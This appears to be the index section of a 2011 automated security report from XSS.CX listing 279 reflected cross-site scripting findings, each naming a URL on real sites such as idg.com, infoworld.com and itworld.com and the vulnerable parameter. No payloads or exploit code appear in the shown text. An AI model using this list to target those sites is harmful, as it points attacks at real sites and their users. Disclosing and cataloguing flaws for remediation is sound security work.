XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09202011-01

Report generated by XSS.CX at Wed Sep 21 17:07:22 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. http://www.demo.com/a/i/wht-org-grd.png [REST URL parameter 3]

1.2. http://www.demo.com/a/i/wht-org-grd.png [name of an arbitrarily supplied request parameter]

1.3. http://www.demo.com/a/l/ngconnect_108x54.gif [REST URL parameter 3]

1.4. http://www.demo.com/a/l/ngconnect_108x54.gif [name of an arbitrarily supplied request parameter]

1.5. http://www.demo.com/favicon.ico [REST URL parameter 1]

1.6. http://www.dinclinx.com/ [name of an arbitrarily supplied request parameter]

1.7. http://www.genuinewin7.com/purchase.aspx [WT.page_from parameter]

1.8. http://www.google.com/search [tch parameter]

1.9. http://www.idg.com/ [name of an arbitrarily supplied request parameter]

1.10. http://www.idg.com/idgnetrssfeeds.nsf/html [REST URL parameter 2]

1.11. http://www.idg.com/idgnetrssfeeds.nsf/html [openpage parameter]

1.12. http://www.idg.com/www/homenew.nsf/DataRequestor.js [OpenJavascriptLibrary parameter]

1.13. http://www.idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 1]

1.14. http://www.idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 3]

1.15. http://www.idg.com/www/homenew.nsf/JSLib.js [OpenJavascriptLibrary parameter]

1.16. http://www.idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 1]

1.17. http://www.idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 3]

1.18. http://www.idg.com/www/homenew.nsf/ajaxroutine.js [OpenJavascriptLibrary parameter]

1.19. http://www.idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 1]

1.20. http://www.idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 3]

1.21. http://www.idg.com/www/homenew.nsf/core.js [OpenJavascriptLibrary parameter]

1.22. http://www.idg.com/www/homenew.nsf/core.js [REST URL parameter 1]

1.23. http://www.idg.com/www/homenew.nsf/core.js [REST URL parameter 3]

1.24. http://www.idg.com/www/homenew.nsf/home [REST URL parameter 1]

1.25. http://www.idg.com/www/homenew.nsf/home [REST URL parameter 3]

1.26. http://www.idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]

1.27. http://www.idg.com/www/homenew.nsf/home [readform parameter]

1.28. http://www.idg.com/www/homenew.nsf/idg_mainbanner.jpg [REST URL parameter 1]

1.29. http://www.idg.com/www/homenew.nsf/idg_mainbanner.jpg [REST URL parameter 3]

1.30. http://www.idg.com/www/homenew.nsf/idg_mainbanner.jpg [openimageresource parameter]

1.31. http://www.idg.com/www/homenew.nsf/menu.js [OpenJavascriptLibrary parameter]

1.32. http://www.idg.com/www/homenew.nsf/menu.js [REST URL parameter 1]

1.33. http://www.idg.com/www/homenew.nsf/menu.js [REST URL parameter 3]

1.34. http://www.idg.com/www/homenew.nsf/public_smo_scripts.js [OpenJavascriptLibrary parameter]

1.35. http://www.idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 1]

1.36. http://www.idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 3]

1.37. http://www.idg.com/www/homenew.nsf/request.js [OpenJavascriptLibrary parameter]

1.38. http://www.idg.com/www/homenew.nsf/request.js [REST URL parameter 1]

1.39. http://www.idg.com/www/homenew.nsf/request.js [REST URL parameter 3]

1.40. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 1]

1.41. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 2]

1.42. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 3]

1.43. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 4]

1.44. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 5]

1.45. http://www.infoworld.com/modules/DCP/contrib/views/css/views.css [REST URL parameter 6]

1.46. http://www.infoworld.com/modules/DCP/custom/demandbase/demandbase.js [REST URL parameter 1]

1.47. http://www.infoworld.com/modules/DCP/custom/demandbase/demandbase.js [REST URL parameter 2]

1.48. http://www.infoworld.com/modules/DCP/custom/demandbase/demandbase.js [REST URL parameter 3]

1.49. http://www.infoworld.com/modules/DCP/custom/demandbase/demandbase.js [REST URL parameter 4]

1.50. http://www.infoworld.com/modules/DCP/custom/demandbase/demandbase.js [REST URL parameter 5]

1.51. http://www.infoworld.com/modules/DCP/custom/doubleclick_ads/doubleclick_ads.js [REST URL parameter 1]

1.52. http://www.infoworld.com/modules/DCP/custom/doubleclick_ads/doubleclick_ads.js [REST URL parameter 2]

1.53. http://www.infoworld.com/modules/DCP/custom/doubleclick_ads/doubleclick_ads.js [REST URL parameter 3]

1.54. http://www.infoworld.com/modules/DCP/custom/doubleclick_ads/doubleclick_ads.js [REST URL parameter 4]

1.55. http://www.infoworld.com/modules/DCP/custom/doubleclick_ads/doubleclick_ads.js [REST URL parameter 5]

1.56. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 1]

1.57. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 2]

1.58. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 3]

1.59. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 4]

1.60. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 5]

1.61. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_header.jpg [REST URL parameter 6]

1.62. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 1]

1.63. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 2]

1.64. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 3]

1.65. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 4]

1.66. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 5]

1.67. http://www.infoworld.com/sites/all/themes/ifw/images/bg_IW_logo.png [REST URL parameter 6]

1.68. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 1]

1.69. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 2]

1.70. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 3]

1.71. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 4]

1.72. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 5]

1.73. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 6]

1.74. http://www.infoworld.com/sites/all/themes/ifw/images/icons/small_right_arrow_white.gif [REST URL parameter 7]

1.75. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 1]

1.76. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 2]

1.77. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 3]

1.78. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 4]

1.79. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 5]

1.80. http://www.infoworld.com/sites/all/themes/ifw/images/utilitybar_bg.png [REST URL parameter 6]

1.81. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 1]

1.82. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 2]

1.83. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 3]

1.84. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 4]

1.85. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 5]

1.86. http://www.infoworld.com/sites/all/themes/ifw/scripts/leadgen_tracking.js [REST URL parameter 6]

1.87. http://www.infoworld.com/sites/default/files/ifw_favicon.ico [REST URL parameter 1]

1.88. http://www.infoworld.com/sites/default/files/ifw_favicon.ico [REST URL parameter 2]

1.89. http://www.infoworld.com/sites/default/files/ifw_favicon.ico [REST URL parameter 3]

1.90. http://www.infoworld.com/sites/default/files/ifw_favicon.ico [REST URL parameter 4]

1.91. http://www.itworld.com/elqNow/elqBlank.htm [REST URL parameter 1]

1.92. http://www.itworld.com/elqNow/elqBlank.htm [REST URL parameter 1]

1.93. http://www.itworld.com/elqNow/elqBlank.htm [REST URL parameter 2]

1.94. http://www.itworld.com/elqNow/elqBlank.htm [REST URL parameter 2]

1.95. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 1]

1.96. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 1]

1.97. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 2]

1.98. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 2]

1.99. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 3]

1.100. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 3]

1.101. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [name of an arbitrarily supplied request parameter]

1.102. http://www.itworld.com/kickapps/isfollowing-comments/204223 [REST URL parameter 1]

1.103. http://www.itworld.com/kickapps/isfollowing-comments/204223 [REST URL parameter 1]

1.104. http://www.itworld.com/kickapps/isfollowing-comments/204223 [REST URL parameter 2]

1.105. http://www.itworld.com/kickapps/isfollowing-comments/204223 [REST URL parameter 2]

1.106. http://www.itworld.com/misc/collapse.js [REST URL parameter 1]

1.107. http://www.itworld.com/misc/collapse.js [REST URL parameter 1]

1.108. http://www.itworld.com/misc/collapse.js [REST URL parameter 2]

1.109. http://www.itworld.com/misc/collapse.js [REST URL parameter 2]

1.110. http://www.itworld.com/misc/drupal.js [REST URL parameter 1]

1.111. http://www.itworld.com/misc/drupal.js [REST URL parameter 1]

1.112. http://www.itworld.com/misc/drupal.js [REST URL parameter 2]

1.113. http://www.itworld.com/misc/drupal.js [REST URL parameter 2]

1.114. http://www.itworld.com/misc/textarea.js [REST URL parameter 1]

1.115. http://www.itworld.com/misc/textarea.js [REST URL parameter 1]

1.116. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 1]

1.117. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 1]

1.118. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 2]

1.119. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 2]

1.120. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 5]

1.121. http://www.itworld.com/sites/all/modules/contrib/InsertNode/back_from_comment.js [REST URL parameter 5]

1.122. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js [REST URL parameter 1]

1.123. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js [REST URL parameter 1]

1.124. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js [REST URL parameter 4]

1.125. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js [REST URL parameter 4]

1.126. http://www.itworld.com/sites/all/modules/contrib/ajax_poll/ajax_poll.js [REST URL parameter 6]

1.127. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 1]

1.128. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 1]

1.129. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 2]

1.130. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 2]

1.131. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 4]

1.132. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 4]

1.133. http://www.itworld.com/sites/all/modules/contrib/ajax_poll_results/ajax_poll_results.js [REST URL parameter 6]

1.134. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 2]

1.135. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 2]

1.136. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 3]

1.137. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 3]

1.138. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 5]

1.139. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 6]

1.140. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.cluetip.js [REST URL parameter 6]

1.141. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 3]

1.142. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 3]

1.143. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 5]

1.144. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 6]

1.145. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 6]

1.146. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 7]

1.147. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js [REST URL parameter 7]

1.148. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 1]

1.149. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 1]

1.150. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 4]

1.151. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 4]

1.152. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 5]

1.153. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 5]

1.154. http://www.itworld.com/sites/all/modules/contrib/ctools/js/ajax-responder.js [REST URL parameter 7]

1.155. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 1]

1.156. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 1]

1.157. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 2]

1.158. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 2]

1.159. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 3]

1.160. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 3]

1.161. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 4]

1.162. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 4]

1.163. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 5]

1.164. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 5]

1.165. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 6]

1.166. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 6]

1.167. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 7]

1.168. http://www.itworld.com/sites/all/modules/contrib/ctools/js/modal.js [REST URL parameter 7]

1.169. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 3]

1.170. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 3]

1.171. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 4]

1.172. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 4]

1.173. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 5]

1.174. http://www.itworld.com/sites/all/modules/contrib/dialog/dialog.js [REST URL parameter 5]

1.175. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js [REST URL parameter 4]

1.176. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js [REST URL parameter 5]

1.177. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js [REST URL parameter 5]

1.178. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js [REST URL parameter 6]

1.179. http://www.itworld.com/sites/all/modules/contrib/fbconnect/fbconnect.js [REST URL parameter 6]

1.180. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 1]

1.181. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 1]

1.182. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 4]

1.183. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 5]

1.184. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 5]

1.185. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 6]

1.186. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 6]

1.187. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 7]

1.188. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js [REST URL parameter 7]

1.189. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js [REST URL parameter 1]

1.190. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js [REST URL parameter 1]

1.191. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js [REST URL parameter 4]

1.192. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js [REST URL parameter 4]

1.193. http://www.itworld.com/sites/all/modules/contrib/img_assist/img_assist.js [REST URL parameter 6]

1.194. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 1]

1.195. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 1]

1.196. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 2]

1.197. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 2]

1.198. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 3]

1.199. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 3]

1.200. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 4]

1.201. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 4]

1.202. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 5]

1.203. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 5]

1.204. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 6]

1.205. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 6]

1.206. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 7]

1.207. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 7]

1.208. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 8]

1.209. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 8]

1.210. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 9]

1.211. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js [REST URL parameter 9]

1.212. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 3]

1.213. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 3]

1.214. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 4]

1.215. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 4]

1.216. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 6]

1.217. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 7]

1.218. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 7]

1.219. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 8]

1.220. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.core.js [REST URL parameter 8]

1.221. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 2]

1.222. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 2]

1.223. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 4]

1.224. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 5]

1.225. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 5]

1.226. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 6]

1.227. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 6]

1.228. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 7]

1.229. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 7]

1.230. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 8]

1.231. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.dialog.js [REST URL parameter 8]

1.232. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 2]

1.233. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 2]

1.234. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 4]

1.235. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 5]

1.236. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 5]

1.237. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 6]

1.238. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 6]

1.239. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 7]

1.240. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 7]

1.241. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 8]

1.242. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.draggable.js [REST URL parameter 8]

1.243. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 2]

1.244. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 2]

1.245. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 3]

1.246. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 3]

1.247. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 5]

1.248. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 6]

1.249. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 6]

1.250. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 7]

1.251. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 7]

1.252. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 8]

1.253. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.resizable.js [REST URL parameter 8]

1.254. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.tabs.js [REST URL parameter 1]

1.255. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.tabs.js [REST URL parameter 1]

1.256. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.tabs.js [REST URL parameter 4]

1.257. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.tabs.js [REST URL parameter 4]

1.258. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.tabs.js [REST URL parameter 5]

1.259. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.tabs.js [REST URL parameter 5]

1.260. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.tabs.js [REST URL parameter 7]

1.261. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.tabs.js [REST URL parameter 8]

1.262. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/ui/ui.tabs.js [REST URL parameter 8]

1.263. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.form.js [REST URL parameter 3]

1.264. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.form.js [REST URL parameter 3]

1.265. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.form.js [REST URL parameter 5]

1.266. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.form.js [REST URL parameter 6]

1.267. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.form.js [REST URL parameter 6]

1.268. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.form.js [REST URL parameter 7]

1.269. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.form.js [REST URL parameter 7]

1.270. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.js [REST URL parameter 1]

1.271. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.js [REST URL parameter 1]

1.272. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.js [REST URL parameter 4]

1.273. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.js [REST URL parameter 4]

1.274. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.js [REST URL parameter 5]

1.275. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.js [REST URL parameter 5]

1.276. http://www.itworld.com/sites/all/modules/contrib/jquery_update/replace/jquery.js [REST URL parameter 7]

1.277. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 1]

1.278. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 1]

1.279. http://www.itworld.com/sites/all/modules/contrib/kickapps_comments/js/kickapps_comments.js [REST URL parameter 2]

